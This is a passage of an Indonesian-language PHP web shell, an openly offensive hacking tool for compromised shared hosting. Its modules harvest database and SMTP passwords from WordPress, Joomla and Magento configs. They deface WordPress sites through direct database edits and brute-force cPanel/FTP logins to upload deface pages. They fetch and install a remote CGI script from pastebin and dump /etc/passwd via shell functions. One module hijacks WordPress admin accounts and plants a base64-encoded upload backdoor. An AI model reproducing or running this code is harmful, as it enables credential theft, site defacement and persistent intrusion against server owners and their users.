  3275. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  3276. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  3277. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  3278. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  3279. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  3280. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  3281. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  3282. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  3283. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  3284. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  3285. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  3286. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  3287. }
  3288. }
  3289. }
  3290. $smpt_hunter = scj($McSl0vv);
  3291. echo $smpt_hunter;
  3292. } elseif($_GET['ikiw'] == 'auto_wp') {
  3293. if($_POST['hajar']) {
  3294. $title = htmlspecialchars($_POST['new_title']);
  3295. $pn_title = str_replace(" ", "-", $title);
  3296. if($_POST['cek_edit'] == "Y") {
  3297. $script = $_POST['edit_content'];
  3298. } else {
  3299. $script = $title;
  3300. }
  3301. $conf = $_POST['config_dir'];
  3302. $scan_conf = scandir($conf);
  3303. foreach($scan_conf as $file_conf) {
  3304. if(!is_file("$conf/$file_conf")) continue;
  3305. $config = file_get_contents("$conf/$file_conf");
  3306. if(preg_match("/WordPress/", $config)) {
  3307. $dbhost = ambilkata($config,"DB_HOST', '","'");
  3308. $dbuser = ambilkata($config,"DB_USER', '","'");
  3309. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3310. $dbname = ambilkata($config,"DB_NAME', '","'");
  3311. $dbprefix = ambilkata($config,"table_prefix = '","'");
  3312. $prefix = $dbprefix."posts";
  3313. $option = $dbprefix."options";
  3314. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3315. $db = mysql_select_db($dbname);
  3316. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  3317. $result = mysql_fetch_array($q);
  3318. $id = $result[ID];
  3319. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3320. $result2 = mysql_fetch_array($q2);
  3321. $target = $result2[option_value];
  3322. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  3323. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  3324. echo "<div style='margin: 5px auto;'>";
  3325. if($target == '') {
  3326. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  3327. } else {
  3328. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  3329. }
  3330. if(!$update OR !$conn OR !$db) {
  3331. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  3332. } else {
  3333. echo "<font color=lime>sukses di ganti.</font><br>";
  3334. }
  3335. echo "</div>";
  3336. mysql_close($conn);
  3337. }
  3338. }
  3339. } else {
  3340. echo "<center>
  3341. <h1>Auto Edit Title+Content WordPress</h1>
  3342. <form method='post'>
  3343. DIR Config: <br>
  3344. <input type='text' size='50' name='config_dir' value='$McSl0vv'><br><br>
  3345. Set Title: <br>
  3346. <input type='text' name='new_title' value='McSl0vv' placeholder='New Title'><br><br>
  3347. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  3348. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  3349. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  3350. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  3351. </form>
  3352. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  3353. ";
  3354. }
  3355. } elseif($_GET['ikiw'] == 'zoneh') {
  3356. if($_POST['submit']) {
  3357. $domain = explode("\r\n", $_POST['url']);
  3358. $nick = $_POST['nick'];
  3359. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  3360. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  3361. function zoneh($url,$nick) {
  3362. $ch = curl_init("http://www.zone-h.com/notify/single");
  3363. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3364. curl_setopt($ch, CURLOPT_POST, true);
  3365. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&ikiwmain1=$url&hackmode=1&reason=1&submit=Send");
  3366. return curl_exec($ch);
  3367. curl_close($ch);
  3368. }
  3369. foreach($domain as $url) {
  3370. $zoneh = zoneh($url,$nick);
  3371. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  3372. echo "$url -> <font color=lime>OK</font><br>";
  3373. } else {
  3374. echo "$url -> <font color=red>ERROR</font><br>";
  3375. }
  3376. }
  3377. } else {
  3378. echo "<center><form method='post'>
  3379. <u>Defacer</u>: <br>
  3380. <input type='text' name='nick' size='50' value='Ikiw Gans'><br>
  3381. <u>Domains</u>: <br>
  3382. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  3383. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  3384. </form>";
  3385. }
  3386. echo "</center>";
  3387. }elseif($_GET['ikiw'] == 'cpftp_auto') {
  3388. if($_POST['crack']) {
  3389. $usercp = explode("\r\n", $_POST['user_cp']);
  3390. $passcp = explode("\r\n", $_POST['pass_cp']);
  3391. $i = 0;
  3392. foreach($usercp as $ucp) {
  3393. foreach($passcp as $pcp) {
  3394. if(@mysql_connect('localhost', $ucp, $pcp)) {
  3395. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  3396. } else {
  3397. $_SESSION[$ucp] = "1";
  3398. $_SESSION[$pcp] = "1";
  3399. if($ucp == '' || $pcp == '') {
  3400. //
  3401. } else {
  3402. echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3403. $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
  3404. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  3405. if((!$ftp_login) || (!$ftp_conn)) {
  3406. echo "[ + ] <font color=red>Login Gagal</font><br><br>";
  3407. } else {
  3408. echo "[ + ] <font color=lime>Login Sukses</font><br>";
  3409. $fi = htmlspecialchars($_POST['file_deface']);
  3410. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  3411. if($deface) {
  3412. $i++;
  3413. echo "[ + ] <font color=lime>Deface Sukses</font><br>";
  3414. if(function_exists('posix_getpwuid')) {
  3415. $domain_cp = file_get_contents("/etc/named.conf");
  3416. if($domain_cp == '') {
  3417. echo "[ + ] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  3418. } else {
  3419. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  3420. foreach($domains_cp[1] as $dj) {
  3421. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3422. $user_cp_url = $user_cp_url['name'];
  3423. if($user_cp_url == $ucp) {
  3424. echo "[ + ] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  3425. break;
  3426. }
  3427. }
  3428. }
  3429. } else {
  3430. echo "[ + ] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  3431. }
  3432. } else {
  3433. echo "[-] <font color=red>Deface Gagal</font><br><br>";
  3434. }
  3435. }
  3436. //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3437. }
  3438. }
  3439. }
  3440. }
  3441. }
  3442. if($i == 0) {
  3443. } else {
  3444. echo "<br>Sukses Deface ".$i." Cpanel by <font color=lime>Ikiw</font>";
  3445. }
  3446. } else {
  3447. echo "<center>
  3448. <form method='post'>
  3449. Filename: <br>
  3450. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  3451. Deface Page: <br>
  3452. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
  3453. USER: <br>
  3454. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3455. $_usercp = fopen("/etc/passwd","r");
  3456. while($getu = fgets($_usercp)) {
  3457. if($getu == '' || !$_usercp) {
  3458. echo "<font color=red>Gagal Membaca /etc/passwd</font>";
  3459. } else {
  3460. preg_match_all("/(.*?):x:/", $getu, $u);
  3461. foreach($u[1] as $user_cp) {
  3462. if(is_dir("/home/$user_cp/public_html")) {
  3463. echo "$user_cp\n";
  3464. }
  3465. }
  3466. }
  3467. }
  3468. echo "</textarea><br>
  3469. PASS: <br>
  3470. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3471. function cp_pass($McSl0vv) {
  3472. $pass = "";
  3473. $McSl0vva = scandir($McSl0vv);
  3474. foreach($McSl0vva as $McSl0vvb) {
  3475. if(!is_file("$McSl0vv/$McSl0vvb")) continue;
  3476. $ambil = file_get_contents("$McSl0vv/$McSl0vvb");
  3477. if(preg_match("/WordPress/", $ambil)) {
  3478. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3479. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3480. $pass .= ambilkata($ambil,"password = '","'")."\n";
  3481. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3482. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3483. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3484. $pass .= ambilkata($ambil,'password = "','"')."\n";
  3485. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3486. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3487. } elseif(preg_match("/client/", $ambil)) {
  3488. preg_match("/password=(.*)/", $ambil, $pass1);
  3489. if(preg_match('/"/', $pass1[1])) {
  3490. $pass1[1] = str_replace('"', "", $pass1[1]);
  3491. $pass .= $pass1[1]."\n";
  3492. }
  3493. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3494. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3495. }
  3496. }
  3497. echo $pass;
  3498. }
  3499. $cp_pass = cp_pass($McSl0vv);
  3500. echo $cp_pass;
  3501. echo "</textarea><br>
  3502. <input type='submit' name='crack' style='width: 450px;' value='ENTOT'>
  3503. </form>
  3504. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3505. }
  3506. }
  3507. elseif($_GET['ikiw'] == 'cgi') {
  3508. $cgi_dir = mkdir('idx_cgi', 0755);
  3509. $file_cgi = "idx_cgi/cgi.izo";
  3510. $isi_htcgi = "AddHandler cgi-script .izo";
  3511. $htcgi = fopen(".htaccess", "w");
  3512. $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  3513. $cgi = fopen($file_cgi, "w");
  3514. fwrite($cgi, $cgi_script);
  3515. fwrite($htcgi, $isi_htcgi);
  3516. chmod($file_cgi, 0755);
  3517. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  3518. } elseif($_GET['ikiw'] == 'fake_root') {
  3519. ob_start();
  3520. function reverse($url) {
  3521. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  3522. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3523. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  3524. curl_setopt($ch, CURLOPT_HEADER, 0);
  3525. curl_setopt($ch, CURLOPT_POST, 1);
  3526. $resp = curl_exec($ch);
  3527. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  3528. $array = explode(",,", $resp);
  3529. unset($array[0]);
  3530. foreach($array as $lnk) {
  3531. $lnk = "http://$lnk";
  3532. $lnk = str_replace(",", "", $lnk);
  3533. echo $lnk."\n";
  3534. ob_flush();
  3535. flush();
  3536. }
  3537. curl_close($ch);
  3538. }
  3539. function cek($url) {
  3540. $ch = curl_init($url);
  3541. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3542. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  3543. $resp = curl_exec($ch);
  3544. return $resp;
  3545. }
  3546. $cwd = getcwd();
  3547. $ambil_user = explode("/", $cwd);
  3548. $user = $ambil_user[2];
  3549. if($_POST['reverse']) {
  3550. $site = explode("\r\n", $_POST['url']);
  3551. $file = $_POST['file'];
  3552. foreach($site as $url) {
  3553. $cek = cek("$url/~$user/$file");
  3554. if(preg_match("/hacked/i", $cek)) {
  3555. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  3556. }
  3557. }
  3558. } else {
  3559. echo "<center><form method='post'>
  3560. Nama File: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  3561. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  3562. Domain: <br>
  3563. <textarea style='width: 450px; height: 250px;' name='url'>";
  3564. reverse($_SERVER['HTTP_HOST']);
  3565. echo "</textarea><br>
  3566. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  3567. </form><br>
  3568. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  3569. }
  3570. } elseif($_GET['ikiw'] == 'adminer') {
  3571. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $McSl0vv);
  3572. function adminer($url, $isi) {
  3573. $fp = fopen($isi, "w");
  3574. $ch = curl_init();
  3575. curl_setopt($ch, CURLOPT_URL, $url);
  3576. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  3577. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3578. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  3579. curl_setopt($ch, CURLOPT_FILE, $fp);
  3580. return curl_exec($ch);
  3581. curl_close($ch);
  3582. fclose($fp);
  3583. ob_flush();
  3584. flush();
  3585. }
  3586. if(file_exists('adminer.php')) {
  3587. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  3588. } else {
  3589. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  3590. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  3591. } else {
  3592. echo "<center><font color=red>gagal buat file adminer</font></center>";
  3593. }
  3594. }
  3595. }elseif($_GET['ikiw'] == 'passwbypass') {
  3596. echo '<center>Bypass etc/passw With:<br>
  3597. <table style="width:50%">
  3598. <tr>
  3599. <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  3600. <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  3601. <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>
  3602. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>
  3603. <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  3604. </tr></table>Bypass User With : <table style="width:50%">
  3605. <tr>
  3606. <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  3607. <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  3608. <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>
  3609. <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>
  3610. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  3611. </tr>
  3612. </table><br>';
  3613.  
  3614.  
  3615. if ($_POST['awkuser']) {
  3616. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3617. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  3618. echo "</textarea><br>";
  3619. }
  3620. if ($_POST['systuser']) {
  3621. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3622. echo system("ls /var/mail");
  3623. echo "</textarea><br>";
  3624. }
  3625. if ($_POST['passthuser']) {
  3626. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3627. echo passthru("ls /var/mail");
  3628. echo "</textarea><br>";
  3629. }
  3630. if ($_POST['exuser']) {
  3631. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3632. echo exec("ls /var/mail");
  3633. echo "</textarea><br>";
  3634. }
  3635. if ($_POST['shexuser']) {
  3636. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3637. echo shell_exec("ls /var/mail");
  3638. echo "</textarea><br>";
  3639. }
  3640. if($_POST['syst'])
  3641. {
  3642. echo"<textarea class='inputz' cols='65' rows='15'>";
  3643. echo system("cat /etc/passwd");
  3644. echo"</textarea><br><br><b></b><br>";
  3645. }
  3646. if($_POST['passth'])
  3647. {
  3648. echo"<textarea class='inputz' cols='65' rows='15'>";
  3649. echo passthru("cat /etc/passwd");
  3650. echo"</textarea><br><br><b></b><br>";
  3651. }
  3652. if($_POST['ex'])
  3653. {
  3654. echo"<textarea class='inputz' cols='65' rows='15'>";
  3655. echo exec("cat /etc/passwd");
  3656. echo"</textarea><br><br><b></b><br>";
  3657. }
  3658. if($_POST['shex'])
  3659. {
  3660. echo"<textarea class='inputz' cols='65' rows='15'>";
  3661. echo shell_exec("cat /etc/passwd");
  3662. echo"</textarea><br><br><b></b><br>";
  3663. }
  3664. echo '<center>';
  3665. if($_POST['melex'])
  3666. {
  3667. echo"<textarea class='inputz' cols='65' rows='15'>";
  3668. for($uid=0;$uid<60000;$uid++){
  3669. $ara = posix_getpwuid($uid);
  3670. if (!empty($ara)) {
  3671. while (list ($key, $val) = each($ara)){
  3672. print "$val:";
  3673. }
  3674. print "\n";
  3675. }
  3676. }
  3677. echo"</textarea><br><br>";
  3678. }
  3679. //
  3680.  
  3681. //
  3682. } elseif($_GET['ikiw'] == 'auto_dwp') {
  3683. if($_POST['auto_deface_wp']) {
  3684. function anucurl($sites) {
  3685. $ch = curl_init($sites);
  3686. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3687. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3688. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3689. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3690. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3691. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3692. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3693. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3694. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3695. $data = curl_exec($ch);
  3696. curl_close($ch);
  3697. return $data;
  3698. }
  3699. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3700. $post = array(
  3701. "log" => "$userr",
  3702. "pwd" => "$pass",
  3703. "rememberme" => "forever",
  3704. "wp-submit" => "$wp_submit",
  3705. "redirect_to" => "$web",
  3706. "testcookie" => "1",
  3707. );
  3708. $ch = curl_init($cek);
  3709. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3710. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3711. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3712. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3713. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3714. curl_setopt($ch, CURLOPT_POST, 1);
  3715. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3716. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3717. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3718. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3719. $data = curl_exec($ch);
  3720. curl_close($ch);
  3721. return $data;
  3722. }
  3723. $scan = $_POST['link_config'];
  3724. $link_config = scandir($scan);
  3725. $script = htmlspecialchars($_POST['script']);
  3726. $user = "McSl0vv";
  3727. $pass = "McSl0vv";
  3728. $passx = md5($pass);
  3729. foreach($link_config as $McSl0vv_config) {
  3730. if(!is_file("$scan/$McSl0vv_config")) continue;
  3731. $config = file_get_contents("$scan/$McSl0vv_config");
  3732. if(preg_match("/WordPress/", $config)) {
  3733. $dbhost = ambilkata($config,"DB_HOST', '","'");
  3734. $dbuser = ambilkata($config,"DB_USER', '","'");
  3735. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3736. $dbname = ambilkata($config,"DB_NAME', '","'");
  3737. $dbprefix = ambilkata($config,"table_prefix = '","'");
  3738. $prefix = $dbprefix."users";
  3739. $option = $dbprefix."options";
  3740. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3741. $db = mysql_select_db($dbname);
  3742. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3743. $result = mysql_fetch_array($q);
  3744. $id = $result[ID];
  3745. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3746. $result2 = mysql_fetch_array($q2);
  3747. $target = $result2[option_value];
  3748. if($target == '') {
  3749. echo "[ - ] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3750. } else {
  3751. echo "[ + ] $target <br>";
  3752. }
  3753. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3754. if(!$conn OR !$db OR !$update) {
  3755. echo "[ - ] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3756. mysql_close($conn);
  3757. } else {
  3758. $site = "$target/wp-login.php";
  3759. $site2 = "$target/wp-admin/theme-install.php?upload";
  3760. $b1 = anucurl($site2);
  3761. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3762. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3763. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3764. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  3765. $www = "m.php";
  3766. $fp5 = fopen($www,"w");
  3767. fputs($fp5,$upload3);
  3768. $post2 = array(
  3769. "_wpnonce" => "$anu2",
  3770. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3771. "themezip" => "@$www",
  3772. "install-theme-submit" => "Install Now",
  3773. );
  3774. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3775. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3776. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3777. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3778. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3779. curl_setopt($ch, CURLOPT_POST, 1);
  3780. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3781. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3782. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3783. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3784. $data3 = curl_exec($ch);
  3785. curl_close($ch);
  3786. $y = date("Y");
  3787. $m = date("m");
  3788. $namafile = "id.php";
  3789. $fpi = fopen($namafile,"w");
  3790. fputs($fpi,$script);
  3791. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  3792. curl_setopt($ch6, CURLOPT_POST, true);
  3793. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  3794. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  3795. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  3796. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  3797. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  3798. $postResult = curl_exec($ch6);
  3799. curl_close($ch6);
  3800. $as = "$target/k.php";
  3801. $bs = anucurl($as);
  3802. if(preg_match("#$script#is", $bs)) {
  3803. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  3804. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  3805. } else {
  3806. echo "[ - ] <font color='red'>gagal mepes...</font><br>";
  3807. echo "[ - ] coba aja manual: <br>";
  3808. echo "[ + ] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  3809. echo "[ + ] username: <font color=lime>$user</font><br>";
  3810. echo "[ + ] password: <font color=lime>$pass</font><br><br>";
  3811. }
  3812. mysql_close($conn);
  3813. }
  3814. }
  3815. }
  3816. } else {
  3817. echo "<center><h1>WordPress Auto Deface</h1>
  3818. <form method='post'>
  3819. <input type='text' name='link_config' size='50' height='10' value='$McSl0vv'><br>
  3820. <input type='text' name='script' height='10' size='50' placeholder='McSl0vv' required><br>
  3821. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Submit'>
  3822. </form>
  3823. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  3824. </center>";
  3825. }
  3826. } elseif($_GET['ikiw'] == 'auto_dwp2') {
  3827. if($_POST['auto_deface_wp']) {
  3828. function anucurl($sites) {
  3829. $ch = curl_init($sites);
  3830. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3831. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3832. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3833. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3834. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3835. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3836. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3837. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3838. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  3839. $data = curl_exec($ch);
  3840. curl_close($ch);
  3841. return $data;
  3842. }
  3843. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3844. $post = array(
  3845. "log" => "$userr",
  3846. "pwd" => "$pass",
  3847. "rememberme" => "forever",
  3848. "wp-submit" => "$wp_submit",
  3849. "redirect_to" => "$web",
  3850. "testcookie" => "1",
  3851. );
  3852. $ch = curl_init($cek);
  3853. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3854. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3855. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3856. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3857. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3858. curl_setopt($ch, CURLOPT_POST, 1);
  3859. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3860. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3861. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3862. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3863. $data = curl_exec($ch);
  3864. curl_close($ch);
  3865. return $data;
  3866. }
  3867. $link = explode("\r\n", $_POST['link']);
  3868. $script = htmlspecialchars($_POST['script']);
  3869. $user = "McSl0vv";
  3870. $pass = "McSl0vv";
  3871. $passx = md5($pass);
  3872. foreach($link as $McSl0vv_config) {
  3873. $config = anucurl($McSl0vv_config);
  3874. $dbhost = ambilkata($config,"DB_HOST', '","'");
  3875. $dbuser = ambilkata($config,"DB_USER', '","'");
  3876. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3877. $dbname = ambilkata($config,"DB_NAME', '","'");
  3878. $dbprefix = ambilkata($config,"table_prefix = '","'");
  3879. $prefix = $dbprefix."users";
  3880. $option = $dbprefix."options";
  3881. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3882. $db = mysql_select_db($dbname);
  3883. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3884. $result = mysql_fetch_array($q);
  3885. $id = $result[ID];
  3886. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3887. $result2 = mysql_fetch_array($q2);
  3888. $target = $result2[option_value];
